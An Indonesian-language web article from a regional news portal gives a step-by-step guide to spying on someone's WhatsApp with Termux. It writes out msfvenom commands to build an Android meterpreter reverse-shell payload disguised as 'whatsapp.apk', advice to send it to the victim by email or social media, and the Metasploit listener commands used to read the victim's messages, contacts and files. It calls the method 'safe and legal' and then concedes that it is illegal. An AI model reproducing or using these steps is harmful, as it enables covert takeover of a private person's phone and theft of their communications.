Ini Dia Cara Sadap WA Tanpa Menyentuh HP Korban Tahun 2024, Mudah Banget Pakai Termux!

Whatsapp merupakan salah satu aplikasi pesan instan yang paling populer di dunia saat ini. Banyak orang ingin tahu cara untuk menyadap Whatsapp seseorang tanpa harus menyentuh hp korban. Di dalam artikel ini, kita akan membahas cara sadap Whatsapp tanpa menyentuh hp korban 2024 termux dengan menggunakan metode yang aman dan legal.

1. Apa itu Termux?

Termux adalah aplikasi emulator untuk menjalankan Linux di sistem operasi Android. Dengan menggunakan Termux, pengguna dapat mengakses command line interface (CLI) serta menginstal paket-paket yang biasanya hanya tersedia di sistem operasi Linux. Dengan kata lain, Termux memungkinkan pengguna untuk menjalankan perintah-perintah Linux di perangkat Android.

2. Persiapkan Perangkat

Sebelum memulai proses sadap Whatsapp, pastikan kamu telah menyiapkan perangkat yang kamu butuhkan, yaitu:

  • Perangkat Android yang sudah di-root (jika diperlukan)
  • Aplikasi Termux yang telah diinstal di perangkat Android
  • Koneksi internet yang stabil

3. Langkah-langkah Sadap Whatsapp dengan Termux

3.1 Instal Tool Metasploit

Metasploit adalah sebuah framework open source yang digunakan untuk mengembangkan, menguji, dan mengeksploitasi kerentanan keamanan. Untuk menginstal Metasploit di Termux, kamu bisa mengikuti langkah-langkah berikut:

  1. Buka aplikasi Termux
  2. Ketik perintah berikut: pkg update && pkg upgrade
  3. Selanjutnya, ketik: pkg install git wget curl openssh
  4. Instal Metasploit dengan perintah: pkg install unstable-repo metasploit

3.2 Persiapkan Payload

Payload adalah kode yang akan dieksekusi di perangkat korban setelah mereka terpengaruh oleh kerentanan keamanan. Untuk membuat payload, kamu bisa menggunakan Metasploit dengan menjalankan perintah: msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip kamu] LPORT=[port] R > /sdcard/whatsapp.apk

3.3 Kirim Payload ke Korban

Setelah payload berhasil dibuat, langkah selanjutnya adalah mengirim payload ke perangkat korban. Kamu bisa menggunakan berbagai metode seperti email, pesan teks, atau media sosial untuk mengirimkan file APK tersebut.

3.4 Mulai Listener Metasploit

Setelah korban menginstal aplikasi APK yang telah kamu kirimkan, kamu bisa memulai listener Metasploit dengan menjalankan perintah: msfconsole. Selanjutnya, ketik: use exploit/multi/handler dan atur payload dengan perintah: set payload android/meterpreter/reverse_tcp. Terakhir, jalankan exploit dengan perintah: exploit.

3.5 Sadap Whatsapp Korban

Setelah listener berhasil, kamu bisa mulai mengeksploitasi perangkat korban. Kamu bisa menjalankan berbagai perintah Metasploit untuk melakukan aktivitas sadap Whatsapp, seperti mengakses pesan, kontak, panggilan, dan file media korban.

4. Kesimpulan

Demikianlah cara untuk menyadap Whatsapp seseorang tanpa harus menyentuh hp korban menggunakan Termux. Penting untuk diingat bahwa kegiatan ini harus dilakukan dengan etika dan kehati-hatian. Sadap Whatsapp tanpa izin korban adalah tindakan ilegal dan dapat dikenakan sanksi hukum. Oleh karena itu, pastikan untuk selalu menggunakan teknik-teknik ini dengan bijaksana dan bertanggung jawab.

Redaksi kpidjatim.id

kpidjatim.id adalah portal berita dan informasi terbaru Jawa Timur saat ini. Situs ini memiliki visi untuk memberikan informasi yang akurat, terkini, dan bermanfaat bagi masyarakat Jawa Timur.
Back to top button